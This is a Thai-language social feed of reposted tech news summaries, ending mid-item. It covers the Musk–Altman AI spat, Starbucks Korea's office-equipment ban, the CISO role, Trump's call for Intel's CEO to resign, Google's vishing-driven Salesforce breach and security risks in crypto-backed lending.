ผู้ใช้หลายคนพบว่า AI เปลี่ยนคำตอบตามบริบทของคำถาม ➡️ สะท้อนถึงความอ่อนไหวของโมเดลต่อการตั้งคำถามและการ “ป้อนคำ” ✅ การเปรียบเทียบ Grok กับ ChatGPT ➡️ Musk อ้างว่า Grok ดีกว่า GPT-5 ➡️ Altmanไม่ตอบตรง แต่เน้นโจมตีพฤติกรรมของ Musk ➡️ Grok เคยถูกวิจารณ์เรื่องการให้ข้อมูลเท็จและเนื้อหาขัดแย้ง https://www.thestar.com.my/tech/tech-news/2025/08/16/039you-liar039-elon-musk-and-sam-altman039s-ai-battle-erupts-on-social-media
    0 ความคิดเห็น 0 การแบ่งปัน 187 มุมมอง 0 รีวิว
  • Starbucks เกาหลีใต้ขอคืนพื้นที่: ห้ามตั้งออฟฟิศในร้านกาแฟ

    ในเกาหลีใต้ การใช้ร้านกาแฟเป็นพื้นที่ทำงานหรือเรียนกลายเป็นวัฒนธรรมที่แพร่หลายจน Starbucks ต้องออกมาตรการใหม่ทั่วประเทศ โดยติดป้ายประกาศห้ามลูกค้านำอุปกรณ์สำนักงานมาใช้ในร้าน เช่น คอมพิวเตอร์ตั้งโต๊ะ เครื่องพิมพ์ ปลั๊กพ่วงหลายช่อง และฉากกั้นส่วนตัว

    กลุ่มลูกค้าที่มีพฤติกรรมเช่นนี้ถูกเรียกว่า “คากงจก” (cagongjok) ซึ่งเป็นคำผสมระหว่าง “คาเฟ่” กับ “กงบู” (เรียน) หมายถึงคนที่ใช้ร้านกาแฟเป็นพื้นที่ทำงานหรือเรียนเป็นเวลานาน โดยบางคนถึงขั้นนำเครื่องพิมพ์มาเสียบปลั๊กของร้าน หรือสร้างบูธส่วนตัวด้วยฉากกั้น

    Starbucks ระบุว่ามาตรการนี้มีเป้าหมายเพื่อให้ร้านสะดวกสำหรับลูกค้าทุกคน และลดความเสี่ยงจากการสูญหายหรือขโมยทรัพย์สิน โดยพนักงานจะคอยแจ้งเตือนลูกค้าที่ใช้พื้นที่เกินความจำเป็น หรือทิ้งของไว้บนโต๊ะนานเกินไป

    ปรากฏการณ์นี้เกิดขึ้นท่ามกลาง “คาเฟ่บูม” ในเกาหลีใต้ ซึ่งมีร้านกาแฟมากกว่า 100,000 แห่งทั่วประเทศ และการใช้ร้านกาแฟเป็นพื้นที่ทำงานก็เพิ่มขึ้นอย่างรวดเร็ว แต่การนั่งนานเกินไปอาจทำให้ร้านขาดทุน เพราะกาแฟหนึ่งแก้วครอบคลุมค่าใช้ที่นั่งได้เพียง 1 ชั่วโมง 42 นาทีเท่านั้น

    https://www.tomshardware.com/software/social-media/korean-starbucks-bans-desktop-pcs-printers-and-office-partitions-power-strips-also-forbidden-in-crackdown-on-industrious-customers
    ☕🖥️ Starbucks เกาหลีใต้ขอคืนพื้นที่: ห้ามตั้งออฟฟิศในร้านกาแฟ ในเกาหลีใต้ การใช้ร้านกาแฟเป็นพื้นที่ทำงานหรือเรียนกลายเป็นวัฒนธรรมที่แพร่หลายจน Starbucks ต้องออกมาตรการใหม่ทั่วประเทศ โดยติดป้ายประกาศห้ามลูกค้านำอุปกรณ์สำนักงานมาใช้ในร้าน เช่น คอมพิวเตอร์ตั้งโต๊ะ เครื่องพิมพ์ ปลั๊กพ่วงหลายช่อง และฉากกั้นส่วนตัว กลุ่มลูกค้าที่มีพฤติกรรมเช่นนี้ถูกเรียกว่า “คากงจก” (cagongjok) ซึ่งเป็นคำผสมระหว่าง “คาเฟ่” กับ “กงบู” (เรียน) หมายถึงคนที่ใช้ร้านกาแฟเป็นพื้นที่ทำงานหรือเรียนเป็นเวลานาน โดยบางคนถึงขั้นนำเครื่องพิมพ์มาเสียบปลั๊กของร้าน หรือสร้างบูธส่วนตัวด้วยฉากกั้น Starbucks ระบุว่ามาตรการนี้มีเป้าหมายเพื่อให้ร้านสะดวกสำหรับลูกค้าทุกคน และลดความเสี่ยงจากการสูญหายหรือขโมยทรัพย์สิน โดยพนักงานจะคอยแจ้งเตือนลูกค้าที่ใช้พื้นที่เกินความจำเป็น หรือทิ้งของไว้บนโต๊ะนานเกินไป ปรากฏการณ์นี้เกิดขึ้นท่ามกลาง “คาเฟ่บูม” ในเกาหลีใต้ ซึ่งมีร้านกาแฟมากกว่า 100,000 แห่งทั่วประเทศ และการใช้ร้านกาแฟเป็นพื้นที่ทำงานก็เพิ่มขึ้นอย่างรวดเร็ว แต่การนั่งนานเกินไปอาจทำให้ร้านขาดทุน เพราะกาแฟหนึ่งแก้วครอบคลุมค่าใช้ที่นั่งได้เพียง 1 ชั่วโมง 42 นาทีเท่านั้น https://www.tomshardware.com/software/social-media/korean-starbucks-bans-desktop-pcs-printers-and-office-partitions-power-strips-also-forbidden-in-crackdown-on-industrious-customers
    WWW.TOMSHARDWARE.COM
    Korean Starbucks bans desktop PCs, printers, and office partitions — power strips also forbidden in crackdown on industrious customers
    A new ‘Guide to comfortable use of the store’ asks café visitors to stop bringing in ‘Personal desktops, printers, power strips, partitions, etc.’
    0 ความคิดเห็น 0 การแบ่งปัน 217 มุมมอง 0 รีวิว
  • เรื่องเล่าจากห้องประชุม: CISO ผู้นำความมั่นคงไซเบอร์ที่องค์กรยุคใหม่ขาดไม่ได้

    ในยุคที่ข้อมูลคือทรัพย์สินที่มีค่าที่สุดขององค์กร ตำแหน่ง “CISO” หรือ Chief Information Security Officer จึงกลายเป็นหนึ่งในบทบาทที่สำคัญที่สุดในระดับผู้บริหาร โดยมีหน้าที่ดูแลความปลอดภัยของข้อมูลและระบบดิจิทัลทั้งหมดขององค์กร

    แต่รู้ไหมว่า...มีเพียง 45% ของบริษัทในอเมริกาเหนือเท่านั้นที่มี CISO และในบริษัทที่มีรายได้เกินพันล้านดอลลาร์ ตัวเลขนี้ลดลงเหลือเพียง 15%! หลายองค์กรยังมองว่า cybersecurity เป็นแค่ต้นทุนด้าน IT ไม่ใช่ความเสี่ยงเชิงกลยุทธ์ ทำให้ CISO บางคนต้องรายงานต่อ CIO หรือ CSO แทนที่จะได้ที่นั่งในห้องประชุมผู้บริหาร

    CISO ที่มีอำนาจจริงจะต้องรับผิดชอบตั้งแต่การวางนโยบายความปลอดภัย การจัดการความเสี่ยง การตอบสนองเหตุการณ์ ไปจนถึงการสื่อสารกับบอร์ดและผู้ถือหุ้น พวกเขาต้องมีทั้งความรู้ด้านเทคนิค เช่น DNS, VPN, firewall และความเข้าใจในกฎหมายอย่าง GDPR, HIPAA, SOX รวมถึงทักษะการบริหารและการสื่อสารเชิงธุรกิจ

    ในปี 2025 บทบาทของ CISO ขยายไปสู่การกำกับดูแล AI, การควบรวมกิจการ และการเปลี่ยนผ่านดิจิทัล ทำให้พวกเขากลายเป็น “ผู้ขับเคลื่อนกลยุทธ์องค์กร” ไม่ใช่แค่ “ผู้เฝ้าประตูระบบ”

    CISO คือผู้บริหารระดับสูงที่รับผิดชอบด้านความปลอดภัยของข้อมูล
    ดูแลทั้งระบบ IT, นโยบาย, การตอบสนองเหตุการณ์ และการบริหารความเสี่ยง

    มีเพียง 45% ของบริษัทในอเมริกาเหนือที่มี CISO
    และเพียง 15% ของบริษัทที่มีรายได้เกิน $1B ที่มี CISO ในระดับ C-suite

    CISO ที่รายงานตรงต่อ CEO หรือบอร์ดจะมีอิทธิพลมากกว่า
    ช่วยให้การตัดสินใจด้านความปลอดภัยมีน้ำหนักในเชิงกลยุทธ์

    หน้าที่หลักของ CISO ได้แก่:
    Security operations, Cyber risk, Data loss prevention, Architecture, IAM, Program management, Forensics, Governance

    คุณสมบัติของ CISO ที่ดีต้องมีทั้งพื้นฐานเทคนิคและทักษะธุรกิจ
    เช่น ความเข้าใจใน DNS, VPN, ethical hacking, compliance และการสื่อสารกับผู้บริหาร

    บทบาทของ CISO ขยายไปสู่การกำกับดูแล AI และการควบรวมกิจการ
    ทำให้กลายเป็นผู้ขับเคลื่อนกลยุทธ์องค์กร ไม่ใช่แค่ฝ่ายเทคนิค

    มีการแบ่งประเภท CISO เป็น 3 กลุ่ม: Strategic, Functional, Tactical
    Strategic CISO มีอิทธิพลสูงสุดในองค์กรและได้รับค่าตอบแทนสูง

    ความท้าทายใหม่ของ CISO ได้แก่ภัยคุกคามจาก AI, ransomware และ social engineering
    ต้องใช้แนวทางป้องกันที่ปรับตัวได้และเน้นการฝึกอบรมพนักงาน

    การมี CISO ที่มี visibility ในบอร์ดช่วยเพิ่มความพึงพอใจในงานและโอกาสเติบโต
    เช่น การสร้างความสัมพันธ์กับบอร์ดนอกการประชุม

    https://www.csoonline.com/article/566757/what-is-a-ciso-responsibilities-and-requirements-for-this-vital-leadership-role.html
    🛡️🏢 เรื่องเล่าจากห้องประชุม: CISO ผู้นำความมั่นคงไซเบอร์ที่องค์กรยุคใหม่ขาดไม่ได้ ในยุคที่ข้อมูลคือทรัพย์สินที่มีค่าที่สุดขององค์กร ตำแหน่ง “CISO” หรือ Chief Information Security Officer จึงกลายเป็นหนึ่งในบทบาทที่สำคัญที่สุดในระดับผู้บริหาร โดยมีหน้าที่ดูแลความปลอดภัยของข้อมูลและระบบดิจิทัลทั้งหมดขององค์กร แต่รู้ไหมว่า...มีเพียง 45% ของบริษัทในอเมริกาเหนือเท่านั้นที่มี CISO และในบริษัทที่มีรายได้เกินพันล้านดอลลาร์ ตัวเลขนี้ลดลงเหลือเพียง 15%! หลายองค์กรยังมองว่า cybersecurity เป็นแค่ต้นทุนด้าน IT ไม่ใช่ความเสี่ยงเชิงกลยุทธ์ ทำให้ CISO บางคนต้องรายงานต่อ CIO หรือ CSO แทนที่จะได้ที่นั่งในห้องประชุมผู้บริหาร CISO ที่มีอำนาจจริงจะต้องรับผิดชอบตั้งแต่การวางนโยบายความปลอดภัย การจัดการความเสี่ยง การตอบสนองเหตุการณ์ ไปจนถึงการสื่อสารกับบอร์ดและผู้ถือหุ้น พวกเขาต้องมีทั้งความรู้ด้านเทคนิค เช่น DNS, VPN, firewall และความเข้าใจในกฎหมายอย่าง GDPR, HIPAA, SOX รวมถึงทักษะการบริหารและการสื่อสารเชิงธุรกิจ ในปี 2025 บทบาทของ CISO ขยายไปสู่การกำกับดูแล AI, การควบรวมกิจการ และการเปลี่ยนผ่านดิจิทัล ทำให้พวกเขากลายเป็น “ผู้ขับเคลื่อนกลยุทธ์องค์กร” ไม่ใช่แค่ “ผู้เฝ้าประตูระบบ” ✅ CISO คือผู้บริหารระดับสูงที่รับผิดชอบด้านความปลอดภัยของข้อมูล ➡️ ดูแลทั้งระบบ IT, นโยบาย, การตอบสนองเหตุการณ์ และการบริหารความเสี่ยง ✅ มีเพียง 45% ของบริษัทในอเมริกาเหนือที่มี CISO ➡️ และเพียง 15% ของบริษัทที่มีรายได้เกิน $1B ที่มี CISO ในระดับ C-suite ✅ CISO ที่รายงานตรงต่อ CEO หรือบอร์ดจะมีอิทธิพลมากกว่า ➡️ ช่วยให้การตัดสินใจด้านความปลอดภัยมีน้ำหนักในเชิงกลยุทธ์ ✅ หน้าที่หลักของ CISO ได้แก่: ➡️ Security operations, Cyber risk, Data loss prevention, Architecture, IAM, Program management, Forensics, Governance ✅ คุณสมบัติของ CISO ที่ดีต้องมีทั้งพื้นฐานเทคนิคและทักษะธุรกิจ ➡️ เช่น ความเข้าใจใน DNS, VPN, ethical hacking, compliance และการสื่อสารกับผู้บริหาร ✅ บทบาทของ CISO ขยายไปสู่การกำกับดูแล AI และการควบรวมกิจการ ➡️ ทำให้กลายเป็นผู้ขับเคลื่อนกลยุทธ์องค์กร ไม่ใช่แค่ฝ่ายเทคนิค ✅ มีการแบ่งประเภท CISO เป็น 3 กลุ่ม: Strategic, Functional, Tactical ➡️ Strategic CISO มีอิทธิพลสูงสุดในองค์กรและได้รับค่าตอบแทนสูง ✅ ความท้าทายใหม่ของ CISO ได้แก่ภัยคุกคามจาก AI, ransomware และ social engineering ➡️ ต้องใช้แนวทางป้องกันที่ปรับตัวได้และเน้นการฝึกอบรมพนักงาน ✅ การมี CISO ที่มี visibility ในบอร์ดช่วยเพิ่มความพึงพอใจในงานและโอกาสเติบโต ➡️ เช่น การสร้างความสัมพันธ์กับบอร์ดนอกการประชุม https://www.csoonline.com/article/566757/what-is-a-ciso-responsibilities-and-requirements-for-this-vital-leadership-role.html
    WWW.CSOONLINE.COM
    What is a CISO? The top IT security leader role explained
    The chief information security officer (CISO) is the executive responsible for an organization’s information and data security. Here’s what it takes to succeed in this role.
    0 ความคิดเห็น 0 การแบ่งปัน 297 มุมมอง 0 รีวิว
  • เรื่องนี้ลุงเห็นด้วยกับพี่ตั๊มป์

    เรื่องเล่าจากโลกการเมืองและเทคโนโลยี: เมื่อทรัมป์เรียกร้องให้ซีอีโอ Intel ลาออก เพราะ “ขัดแย้งผลประโยชน์” กับจีน

    ในวันที่ 7 สิงหาคม 2025 อดีตประธานาธิบดีโดนัลด์ ทรัมป์ ได้โพสต์บน Truth Social เรียกร้องให้ Lip-Bu Tan ซีอีโอคนใหม่ของ Intel ลาออกทันที โดยกล่าวว่าเขา “ขัดแย้งผลประโยชน์อย่างรุนแรง” เนื่องจากมีความเกี่ยวข้องกับบริษัทเทคโนโลยีจีนหลายแห่ง รวมถึงบางแห่งที่มีความเชื่อมโยงกับกองทัพจีนและพรรคคอมมิวนิสต์จีน

    คำเรียกร้องนี้เกิดขึ้นหลังจากวุฒิสมาชิก Tom Cotton ส่งจดหมายถึงคณะกรรมการบริหารของ Intel เพื่อสอบถามว่า Tan ได้ขายหุ้นหรือถอนตัวจากบริษัทจีนที่อาจเป็นภัยต่อความมั่นคงของสหรัฐหรือไม่ โดยเฉพาะเมื่อ Intel ได้รับเงินสนับสนุนจาก CHIPS Act มูลค่าเกือบ 8 พันล้านดอลลาร์เพื่อสร้างโรงงานในสหรัฐ

    Tan ซึ่งเข้ารับตำแหน่งในเดือนมีนาคม 2025 เคยเป็นซีอีโอของ Cadence Design Systems ซึ่งเพิ่งถูกปรับ 140 ล้านดอลลาร์จากการละเมิดข้อจำกัดการส่งออก โดยขายเทคโนโลยีให้กับมหาวิทยาลัยทหารของจีน

    Intel ตอบโต้ด้วยแถลงการณ์ว่า “บริษัทและ Tan มุ่งมั่นต่อความมั่นคงของชาติสหรัฐ” และยังคงลงทุนในโรงงานผลิตชิปในประเทศ เช่น โรงงานใหม่ในรัฐแอริโซนา อย่างไรก็ตาม หุ้นของ Intel ร่วงลงทันทีหลังคำเรียกร้องของทรัมป์

    ทรัมป์เรียกร้องให้ Lip-Bu Tan ซีอีโอของ Intel ลาออกทันที
    ระบุว่าเขา “ขัดแย้งผลประโยชน์” จากความเกี่ยวข้องกับบริษัทจีน

    วุฒิสมาชิก Tom Cotton ส่งจดหมายสอบถามคณะกรรมการ Intel
    ตั้งคำถามเกี่ยวกับการลงทุนของ Tan ในบริษัทจีนที่มีความเกี่ยวข้องกับกองทัพ

    Cadence Design Systems ซึ่ง Tan เคยเป็นซีอีโอ ถูกปรับ 140 ล้านดอลลาร์
    จากการละเมิดข้อจำกัดการส่งออกไปยังมหาวิทยาลัยทหารของจีน

    Intel ได้รับเงินสนับสนุนจาก CHIPS Act มูลค่าเกือบ 8 พันล้านดอลลาร์
    เพื่อสร้างโรงงานผลิตชิปในสหรัฐ เช่น ในรัฐโอไฮโอและแอริโซนา

    Intel ออกแถลงการณ์ยืนยันความมุ่งมั่นต่อความมั่นคงของชาติ
    ระบุว่า Tan และบริษัทมีเป้าหมายสอดคล้องกับนโยบาย America First

    หุ้นของ Intel ร่วงลงทันทีหลังคำเรียกร้องของทรัมป์
    สะท้อนความกังวลของนักลงทุนต่อความไม่แน่นอนในผู้นำองค์กร

    https://www.tomshardware.com/tech-industry/big-tech/trump-calls-for-intel-ceo-to-resign-claims-lip-bu-tan-is-conflicted
    เรื่องนี้ลุงเห็นด้วยกับพี่ตั๊มป์ 🇺🇸💼 เรื่องเล่าจากโลกการเมืองและเทคโนโลยี: เมื่อทรัมป์เรียกร้องให้ซีอีโอ Intel ลาออก เพราะ “ขัดแย้งผลประโยชน์” กับจีน ในวันที่ 7 สิงหาคม 2025 อดีตประธานาธิบดีโดนัลด์ ทรัมป์ ได้โพสต์บน Truth Social เรียกร้องให้ Lip-Bu Tan ซีอีโอคนใหม่ของ Intel ลาออกทันที โดยกล่าวว่าเขา “ขัดแย้งผลประโยชน์อย่างรุนแรง” เนื่องจากมีความเกี่ยวข้องกับบริษัทเทคโนโลยีจีนหลายแห่ง รวมถึงบางแห่งที่มีความเชื่อมโยงกับกองทัพจีนและพรรคคอมมิวนิสต์จีน คำเรียกร้องนี้เกิดขึ้นหลังจากวุฒิสมาชิก Tom Cotton ส่งจดหมายถึงคณะกรรมการบริหารของ Intel เพื่อสอบถามว่า Tan ได้ขายหุ้นหรือถอนตัวจากบริษัทจีนที่อาจเป็นภัยต่อความมั่นคงของสหรัฐหรือไม่ โดยเฉพาะเมื่อ Intel ได้รับเงินสนับสนุนจาก CHIPS Act มูลค่าเกือบ 8 พันล้านดอลลาร์เพื่อสร้างโรงงานในสหรัฐ Tan ซึ่งเข้ารับตำแหน่งในเดือนมีนาคม 2025 เคยเป็นซีอีโอของ Cadence Design Systems ซึ่งเพิ่งถูกปรับ 140 ล้านดอลลาร์จากการละเมิดข้อจำกัดการส่งออก โดยขายเทคโนโลยีให้กับมหาวิทยาลัยทหารของจีน Intel ตอบโต้ด้วยแถลงการณ์ว่า “บริษัทและ Tan มุ่งมั่นต่อความมั่นคงของชาติสหรัฐ” และยังคงลงทุนในโรงงานผลิตชิปในประเทศ เช่น โรงงานใหม่ในรัฐแอริโซนา อย่างไรก็ตาม หุ้นของ Intel ร่วงลงทันทีหลังคำเรียกร้องของทรัมป์ ✅ ทรัมป์เรียกร้องให้ Lip-Bu Tan ซีอีโอของ Intel ลาออกทันที ➡️ ระบุว่าเขา “ขัดแย้งผลประโยชน์” จากความเกี่ยวข้องกับบริษัทจีน ✅ วุฒิสมาชิก Tom Cotton ส่งจดหมายสอบถามคณะกรรมการ Intel ➡️ ตั้งคำถามเกี่ยวกับการลงทุนของ Tan ในบริษัทจีนที่มีความเกี่ยวข้องกับกองทัพ ✅ Cadence Design Systems ซึ่ง Tan เคยเป็นซีอีโอ ถูกปรับ 140 ล้านดอลลาร์ ➡️ จากการละเมิดข้อจำกัดการส่งออกไปยังมหาวิทยาลัยทหารของจีน ✅ Intel ได้รับเงินสนับสนุนจาก CHIPS Act มูลค่าเกือบ 8 พันล้านดอลลาร์ ➡️ เพื่อสร้างโรงงานผลิตชิปในสหรัฐ เช่น ในรัฐโอไฮโอและแอริโซนา ✅ Intel ออกแถลงการณ์ยืนยันความมุ่งมั่นต่อความมั่นคงของชาติ ➡️ ระบุว่า Tan และบริษัทมีเป้าหมายสอดคล้องกับนโยบาย America First ✅ หุ้นของ Intel ร่วงลงทันทีหลังคำเรียกร้องของทรัมป์ ➡️ สะท้อนความกังวลของนักลงทุนต่อความไม่แน่นอนในผู้นำองค์กร https://www.tomshardware.com/tech-industry/big-tech/trump-calls-for-intel-ceo-to-resign-claims-lip-bu-tan-is-conflicted
    WWW.TOMSHARDWARE.COM
    Trump calls for Intel CEO to resign — claims Lip-Bu Tan is 'conflicted' (Update)
    The Truth Social post comes as a senator scrutinizes Tan's ties to Chinese tech firms.
    0 ความคิดเห็น 0 การแบ่งปัน 288 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: เมื่อ Google ถูกหลอกด้วยเสียง และข้อมูลลูกค้าก็หลุดไป

    ในเดือนมิถุนายน 2025 Google ได้ยืนยันว่าเกิดเหตุข้อมูลรั่วไหลจากระบบ Salesforce ภายในของบริษัท ซึ่งใช้เก็บข้อมูลลูกค้าธุรกิจขนาดกลางและขนาดเล็ก โดยกลุ่มแฮกเกอร์ชื่อดัง ShinyHunters (หรือ UNC6040) ใช้เทคนิค “vishing” หรือการหลอกลวงผ่านเสียงโทรศัพท์ เพื่อหลอกพนักงานให้อนุมัติแอปปลอมที่แฝงตัวเป็นเครื่องมือ Salesforce Data Loader

    เมื่อได้รับสิทธิ์เข้าถึงแล้ว แฮกเกอร์สามารถดูดข้อมูลออกจากระบบได้ในช่วงเวลาสั้น ๆ ก่อนที่ Google จะตรวจพบและตัดการเข้าถึง โดยข้อมูลที่ถูกขโมยนั้นเป็นข้อมูลพื้นฐาน เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ ซึ่ง Google ระบุว่าเป็นข้อมูลที่ “ส่วนใหญ่เปิดเผยอยู่แล้ว”

    อย่างไรก็ตาม เหตุการณ์นี้สะท้อนถึงความเปราะบางของระบบที่พึ่งพามนุษย์เป็นด่านแรก และเป็นส่วนหนึ่งของแคมเปญโจมตีที่กว้างขึ้น ซึ่งมีเป้าหมายเป็นบริษัทที่ใช้ Salesforce เช่น Chanel, Dior, Pandora, Qantas และ Allianz โดยกลุ่ม UNC6240 ซึ่งเชื่อว่าเป็นแขนงของ ShinyHunters จะตามมาด้วยการขู่เรียกค่าไถ่ภายใน 72 ชั่วโมง พร้อมขู่ว่าจะเปิดเผยข้อมูลผ่านเว็บไซต์ “Data Leak Site”

    Google ยืนยันว่าระบบ Salesforce ภายในถูกเจาะข้อมูล
    เกิดขึ้นในเดือนมิถุนายน 2025 โดยกลุ่ม UNC6040

    ข้อมูลที่ถูกขโมยเป็นข้อมูลพื้นฐานของลูกค้าธุรกิจ SMB
    เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ

    แฮกเกอร์ใช้เทคนิค vishing หลอกพนักงานผ่านโทรศัพท์
    โดยปลอมตัวเป็นฝ่าย IT และให้ติดตั้งแอปปลอม

    แอปปลอมถูกระบุว่าเป็น Salesforce Data Loader หรือชื่อหลอกเช่น “My Ticket Portal”
    ใช้ OAuth เพื่อเข้าถึงข้อมูลโดยไม่ถูกตรวจจับ

    Google ตัดการเข้าถึงได้ภายใน “ช่วงเวลาสั้น ๆ”
    และแจ้งลูกค้าที่ได้รับผลกระทบทันที

    กลุ่ม UNC6240 ตามมาด้วยการขู่เรียกค่าไถ่
    โดยส่งอีเมลหรือโทรศัพท์เรียกเงินในรูปแบบ Bitcoin ภายใน 72 ชั่วโมง

    ShinyHunters เคยโจมตี Snowflake, AT&T, PowerSchool และ Oracle Cloud
    เป็นกลุ่มที่มีประวัติการเจาะระบบระดับสูง

    Salesforce ยืนยันว่าแพลตฟอร์มไม่มีช่องโหว่
    ปัญหาเกิดจากการหลอกลวงผู้ใช้ ไม่ใช่ระบบ

    การเชื่อมต่อแอปภายนอกใน Salesforce ใช้รหัส 8 หลัก
    เป็นช่องทางที่แฮกเกอร์ใช้หลอกให้เชื่อมต่อกับแอปปลอม

    บริษัทที่ตกเป็นเหยื่อมีทั้งแบรนด์หรูและสายการบิน
    เช่น Chanel, Dior, Louis Vuitton, Qantas และ Allianz

    Google แนะนำให้ใช้ MFA, จำกัดสิทธิ์ และฝึกอบรมพนักงาน
    เพื่อป้องกันการโจมตีแบบ social engineering

    https://hackread.com/google-salesforce-data-breach-shinyhunters-vishing-scam/
    📞🕵️‍♂️ เรื่องเล่าจากโลกไซเบอร์: เมื่อ Google ถูกหลอกด้วยเสียง และข้อมูลลูกค้าก็หลุดไป ในเดือนมิถุนายน 2025 Google ได้ยืนยันว่าเกิดเหตุข้อมูลรั่วไหลจากระบบ Salesforce ภายในของบริษัท ซึ่งใช้เก็บข้อมูลลูกค้าธุรกิจขนาดกลางและขนาดเล็ก โดยกลุ่มแฮกเกอร์ชื่อดัง ShinyHunters (หรือ UNC6040) ใช้เทคนิค “vishing” หรือการหลอกลวงผ่านเสียงโทรศัพท์ เพื่อหลอกพนักงานให้อนุมัติแอปปลอมที่แฝงตัวเป็นเครื่องมือ Salesforce Data Loader เมื่อได้รับสิทธิ์เข้าถึงแล้ว แฮกเกอร์สามารถดูดข้อมูลออกจากระบบได้ในช่วงเวลาสั้น ๆ ก่อนที่ Google จะตรวจพบและตัดการเข้าถึง โดยข้อมูลที่ถูกขโมยนั้นเป็นข้อมูลพื้นฐาน เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ ซึ่ง Google ระบุว่าเป็นข้อมูลที่ “ส่วนใหญ่เปิดเผยอยู่แล้ว” อย่างไรก็ตาม เหตุการณ์นี้สะท้อนถึงความเปราะบางของระบบที่พึ่งพามนุษย์เป็นด่านแรก และเป็นส่วนหนึ่งของแคมเปญโจมตีที่กว้างขึ้น ซึ่งมีเป้าหมายเป็นบริษัทที่ใช้ Salesforce เช่น Chanel, Dior, Pandora, Qantas และ Allianz โดยกลุ่ม UNC6240 ซึ่งเชื่อว่าเป็นแขนงของ ShinyHunters จะตามมาด้วยการขู่เรียกค่าไถ่ภายใน 72 ชั่วโมง พร้อมขู่ว่าจะเปิดเผยข้อมูลผ่านเว็บไซต์ “Data Leak Site” ✅ Google ยืนยันว่าระบบ Salesforce ภายในถูกเจาะข้อมูล ➡️ เกิดขึ้นในเดือนมิถุนายน 2025 โดยกลุ่ม UNC6040 ✅ ข้อมูลที่ถูกขโมยเป็นข้อมูลพื้นฐานของลูกค้าธุรกิจ SMB ➡️ เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ ✅ แฮกเกอร์ใช้เทคนิค vishing หลอกพนักงานผ่านโทรศัพท์ ➡️ โดยปลอมตัวเป็นฝ่าย IT และให้ติดตั้งแอปปลอม ✅ แอปปลอมถูกระบุว่าเป็น Salesforce Data Loader หรือชื่อหลอกเช่น “My Ticket Portal” ➡️ ใช้ OAuth เพื่อเข้าถึงข้อมูลโดยไม่ถูกตรวจจับ ✅ Google ตัดการเข้าถึงได้ภายใน “ช่วงเวลาสั้น ๆ” ➡️ และแจ้งลูกค้าที่ได้รับผลกระทบทันที ✅ กลุ่ม UNC6240 ตามมาด้วยการขู่เรียกค่าไถ่ ➡️ โดยส่งอีเมลหรือโทรศัพท์เรียกเงินในรูปแบบ Bitcoin ภายใน 72 ชั่วโมง ✅ ShinyHunters เคยโจมตี Snowflake, AT&T, PowerSchool และ Oracle Cloud ➡️ เป็นกลุ่มที่มีประวัติการเจาะระบบระดับสูง ✅ Salesforce ยืนยันว่าแพลตฟอร์มไม่มีช่องโหว่ ➡️ ปัญหาเกิดจากการหลอกลวงผู้ใช้ ไม่ใช่ระบบ ✅ การเชื่อมต่อแอปภายนอกใน Salesforce ใช้รหัส 8 หลัก ➡️ เป็นช่องทางที่แฮกเกอร์ใช้หลอกให้เชื่อมต่อกับแอปปลอม ✅ บริษัทที่ตกเป็นเหยื่อมีทั้งแบรนด์หรูและสายการบิน ➡️ เช่น Chanel, Dior, Louis Vuitton, Qantas และ Allianz ✅ Google แนะนำให้ใช้ MFA, จำกัดสิทธิ์ และฝึกอบรมพนักงาน ➡️ เพื่อป้องกันการโจมตีแบบ social engineering https://hackread.com/google-salesforce-data-breach-shinyhunters-vishing-scam/
    HACKREAD.COM
    Google Confirms Salesforce Data Breach by ShinyHunters via Vishing Scam
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 276 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกคริปโต: เมื่อการกู้เงินด้วยเหรียญดิจิทัลต้องเผชิญภัยไซเบอร์

    ในยุคที่คริปโตไม่ใช่แค่การลงทุน แต่กลายเป็นสินทรัพย์ที่ใช้ค้ำประกันเงินกู้ได้ “Crypto-backed lending” จึงกลายเป็นเทรนด์ที่ทั้งนักลงทุนรายย่อยและสถาบันต่างหันมาใช้กันมากขึ้น เพราะมันเปิดโอกาสให้ผู้ถือเหรียญสามารถกู้เงินโดยไม่ต้องขายเหรียญออกไป

    แต่ในความสะดวกนั้น ก็มีเงามืดของภัยไซเบอร์ที่ซ่อนอยู่ เพราะเมื่อมีสินทรัพย์ดิจิทัลมูลค่าหลายหมื่นล้านดอลลาร์ถูกล็อกไว้ในแพลตฟอร์มเหล่านี้ แฮกเกอร์ก็ยิ่งพัฒนาเทคนิคใหม่ ๆ เพื่อเจาะระบบให้ได้

    ภัยที่พบได้บ่อยคือการเจาะ smart contract ที่มีช่องโหว่ เช่นกรณี Inverse Finance ที่ถูกแฮกผ่านการบิดเบือนข้อมูลจาก oracle จนสูญเงินกว่า 15 ล้านดอลลาร์ หรือกรณี Atomic Wallet ที่สูญเงินกว่า 35 ล้านดอลลาร์เพราะการจัดการ private key ที่หละหลวม

    นอกจากนี้ยังมีการปลอมเว็บกู้เงินบน Telegram และ Discord เพื่อหลอกให้ผู้ใช้กรอก seed phrase หรือ key รวมถึงมัลแวร์ที่แอบเปลี่ยน address ใน clipboard เพื่อขโมยเหรียญแบบเนียน ๆ

    บทเรียนจากอดีต เช่นการล่มของ Celsius Network และการถูกเจาะซ้ำของ Cream Finance แสดงให้เห็นว่าไม่ใช่แค่โค้ดที่ต้องแข็งแรง แต่กระบวนการภายในและการตรวจสอบความเสี่ยงก็ต้องเข้มงวดด้วย

    แนวทางป้องกันที่ดีคือการใช้ multi-signature wallet เช่น Gnosis Safe, การตรวจสอบ smart contract ด้วย formal verification, การตั้งระบบตรวจจับพฤติกรรมผิดปกติแบบ real-time และการให้ผู้ใช้ใช้ hardware wallet ร่วมกับ 2FA เป็นมาตรฐาน

    Crypto-backed lending เติบโตอย่างรวดเร็วในปี 2024
    มีสินทรัพย์กว่า $80B ถูกล็อกใน DeFi lending pools

    ผู้ใช้สามารถกู้ stablecoin โดยใช้ BTC หรือ ETH เป็นหลักประกัน
    ไม่ต้องขายเหรียญเพื่อแลกเป็นเงินสด

    ช่องโหว่ใน smart contract เป็นจุดเสี่ยงหลัก
    เช่นกรณี Inverse Finance สูญเงิน $15M จาก oracle manipulation

    การจัดการ private key ที่ไม่ปลอดภัยนำไปสู่การสูญเงินมหาศาล
